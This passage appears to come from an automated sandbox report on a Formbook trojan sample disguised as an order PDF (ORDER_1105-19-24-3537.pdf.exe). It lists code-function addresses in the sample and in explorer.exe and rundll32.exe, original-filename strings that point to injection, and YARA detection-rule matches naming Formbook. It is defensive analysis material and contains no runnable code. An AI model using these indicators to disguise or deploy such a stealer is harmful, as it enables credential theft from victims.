Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01202446	4_2_01202446
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011FE4F6	4_2_011FE4F6
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01174750	4_2_01174750
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150770	4_2_01150770
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114C7C0	4_2_0114C7C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116C6E0	4_2_0116C6E0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01166962	4_2_01166962
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0121A9A6	4_2_0121A9A6
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011529A0	4_2_011529A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01152840	4_2_01152840
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115A840	4_2_0115A840
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011368B8	4_2_011368B8
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0117E8F0	4_2_0117E8F0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120AB40	4_2_0120AB40
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01206BD7	4_2_01206BD7
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114EA80	4_2_0114EA80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011ECD1F	4_2_011ECD1F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115AD00	4_2_0115AD00
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01168DBF	4_2_01168DBF
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0114ADE0	4_2_0114ADE0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150C00	4_2_01150C00
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F0CB5	4_2_011F0CB5
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01140CF2	4_2_01140CF2
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01170F30	4_2_01170F30
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F2F30	4_2_011F2F30
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01192F28	4_2_01192F28
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C4F40	4_2_011C4F40
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011CEFA0	4_2_011CEFA0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01142FC8	4_2_01142FC8
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115CFE0	4_2_0115CFE0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120EE26	4_2_0120EE26
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01150E59	4_2_01150E59
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01162E90	4_2_01162E90
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120CE93	4_2_0120CE93
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120EEDB	4_2_0120EEDB
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0121B16B	4_2_0121B16B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113F172	4_2_0113F172
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0118516C	4_2_0118516C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0115B1B0	4_2_0115B1B0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120F0E0	4_2_0120F0E0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012070E9	4_2_012070E9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011FF0CC	4_2_011FF0CC
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011570C0	4_2_011570C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120132D	4_2_0120132D
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0113D34C	4_2_0113D34C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0119739A	4_2_0119739A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011552A0	4_2_011552A0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116B2C0	4_2_0116B2C0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F12ED	4_2_011F12ED
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01207571	4_2_01207571
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011ED5B0	4_2_011ED5B0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120F43F	4_2_0120F43F
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01141460	4_2_01141460
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120F7B0	4_2_0120F7B0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01195630	4_2_01195630
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_012016CC	4_2_012016CC
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011E5910	4_2_011E5910
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01159950	4_2_01159950
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116B950	4_2_0116B950
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011BD800	4_2_011BD800
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011538E0	4_2_011538E0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120FB76	4_2_0120FB76
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116FB80	4_2_0116FB80
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0118DBF9	4_2_0118DBF9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C5BF0	4_2_011C5BF0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01207A46	4_2_01207A46
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120FA49	4_2_0120FA49
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C3A6C	4_2_011C3A6C
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011EDAAC	4_2_011EDAAC
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01195AA0	4_2_01195AA0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011F1AA3	4_2_011F1AA3
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011FDAC6	4_2_011FDAC6
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01207D73	4_2_01207D73
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01153D40	4_2_01153D40
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01201D5A	4_2_01201D5A
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0116FDC0	4_2_0116FDC0
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011C9C32	4_2_011C9C32
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120FCF2	4_2_0120FCF2
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120FF09	4_2_0120FF09
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01151F92	4_2_01151F92
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0120FFB1	4_2_0120FFB1
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_01159EB0	4_2_01159EB0
Source: C:\Windows\explorer.exe	Code function: 6_2_0F004232	6_2_0F004232
Source: C:\Windows\explorer.exe	Code function: 6_2_0F001912	6_2_0F001912
Source: C:\Windows\explorer.exe	Code function: 6_2_0EFFA082	6_2_0EFFA082
Source: C:\Windows\explorer.exe	Code function: 6_2_0F0075CD	6_2_0F0075CD
Source: C:\Windows\explorer.exe	Code function: 6_2_0F003036	6_2_0F003036
Source: C:\Windows\explorer.exe	Code function: 6_2_0EFFEB32	6_2_0EFFEB32
Source: C:\Windows\explorer.exe	Code function: 6_2_0EFFEB30	6_2_0EFFEB30
Source: C:\Windows\explorer.exe	Code function: 6_2_0EFFBD02	6_2_0EFFBD02
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9E2B32	6_2_0F9E2B32
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9E2B30	6_2_0F9E2B30
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9E8232	6_2_0F9E8232
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9EB5CD	6_2_0F9EB5CD
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9E5912	6_2_0F9E5912
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9DFD02	6_2_0F9DFD02
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9DE082	6_2_0F9DE082
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9E7036	6_2_0F9E7036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A1E4F6	8_2_04A1E4F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A14420	8_2_04A14420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A22446	8_2_04A22446
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A30591	8_2_04A30591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04970535	8_2_04970535
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0498C6E0	8_2_0498C6E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0496C7C0	8_2_0496C7C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04994750	8_2_04994750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04970770	8_2_04970770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A02000	8_2_04A02000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A241A2	8_2_04A241A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A301AA	8_2_04A301AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A281CC	8_2_04A281CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04960100	8_2_04960100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A0A118	8_2_04A0A118
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049F8158	8_2_049F8158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049F02C0	8_2_049F02C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A10274	8_2_04A10274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A303E6	8_2_04A303E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0497E3F0	8_2_0497E3F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2A352	8_2_04A2A352
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A10CB5	8_2_04A10CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04960CF2	8_2_04960CF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04970C00	8_2_04970C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04988DBF	8_2_04988DBF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0496ADE0	8_2_0496ADE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0497AD00	8_2_0497AD00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A0CD1F	8_2_04A0CD1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04982E90	8_2_04982E90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2CE93	8_2_04A2CE93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2EEDB	8_2_04A2EEDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2EE26	8_2_04A2EE26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04970E59	8_2_04970E59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049EEFA0	8_2_049EEFA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04962FC8	8_2_04962FC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0497CFE0	8_2_0497CFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A12F30	8_2_04A12F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04990F30	8_2_04990F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049B2F28	8_2_049B2F28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049E4F40	8_2_049E4F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049568B8	8_2_049568B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0499E8F0	8_2_0499E8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04972840	8_2_04972840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0497A840	8_2_0497A840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A3A9A6	8_2_04A3A9A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049729A0	8_2_049729A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04986962	8_2_04986962
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0496EA80	8_2_0496EA80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A26BD7	8_2_04A26BD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2AB40	8_2_04A2AB40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2F43F	8_2_04A2F43F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04961460	8_2_04961460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A0D5B0	8_2_04A0D5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A395C3	8_2_04A395C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A27571	8_2_04A27571
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A216CC	8_2_04A216CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049B5630	8_2_049B5630
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2F7B0	8_2_04A2F7B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2F0E0	8_2_04A2F0E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A270E9	8_2_04A270E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049770C0	8_2_049770C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A1F0CC	8_2_04A1F0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0497B1B0	8_2_0497B1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A3B16B	8_2_04A3B16B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0495F172	8_2_0495F172
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049A516C	8_2_049A516C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049752A0	8_2_049752A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A112ED	8_2_04A112ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0498B2C0	8_2_0498B2C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049B739A	8_2_049B739A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2132D	8_2_04A2132D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0495D34C	8_2_0495D34C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2FCF2	8_2_04A2FCF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049E9C32	8_2_049E9C32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0498FDC0	8_2_0498FDC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A27D73	8_2_04A27D73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04973D40	8_2_04973D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A21D5A	8_2_04A21D5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04979EB0	8_2_04979EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04971F92	8_2_04971F92
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2FFB1	8_2_04A2FFB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04933FD2	8_2_04933FD2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04933FD5	8_2_04933FD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2FF09	8_2_04A2FF09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049738E0	8_2_049738E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049DD800	8_2_049DD800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A05910	8_2_04A05910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04979950	8_2_04979950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0498B950	8_2_0498B950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A11AA3	8_2_04A11AA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A0DAAC	8_2_04A0DAAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049B5AA0	8_2_049B5AA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A1DAC6	8_2_04A1DAC6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A27A46	8_2_04A27A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2FA49	8_2_04A2FA49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049E3A6C	8_2_049E3A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0498FB80	8_2_0498FB80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049ADBF9	8_2_049ADBF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049E5BF0	8_2_049E5BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04A2FB76	8_2_04A2FB76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AD593	8_2_007AD593
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AD596	8_2_007AD596
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AEC61	8_2_007AEC61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00792D90	8_2_00792D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00792D89	8_2_00792D89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00799E50	8_2_00799E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00792FB0	8_2_00792FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047AA036	8_2_047AA036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047A2D02	8_2_047A2D02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047AE5CD	8_2_047AE5CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047A1082	8_2_047A1082
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047A8912	8_2_047A8912
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047AB232	8_2_047AB232
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047A5B32	8_2_047A5B32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_047A5B30	8_2_047A5B30

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0495B970 appears 280 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 049B7E54 appears 111 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 049DEA12 appears 86 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 049A5130 appears 58 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 049EF290 appears 105 times
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: String function: 011BEA12 appears 86 times
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: String function: 01197E54 appears 102 times
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: String function: 0113B970 appears 280 times
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: String function: 011CF290 appears 105 times
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: String function: 01185130 appears 58 times

Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2121545176.000000000108E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ORDER_1105-19-24-3537.pdf.exe
Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000000.2079594023.00000000009D8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNgWS.exeL vs ORDER_1105-19-24-3537.pdf.exe
Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2130650225.0000000007680000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs ORDER_1105-19-24-3537.pdf.exe
Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs ORDER_1105-19-24-3537.pdf.exe
Source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166776693.000000000123D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ORDER_1105-19-24-3537.pdf.exe
Source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs ORDER_1105-19-24-3537.pdf.exe
Source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166669799.00000000010DC000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs ORDER_1105-19-24-3537.pdf.exe
Source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs ORDER_1105-19-24-3537.pdf.exe
Source: ORDER_1105-19-24-3537.pdf.exe	Binary or memory string: OriginalFilenameNgWS.exeL vs ORDER_1105-19-24-3537.pdf.exe

Source: ORDER_1105-19-24-3537.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
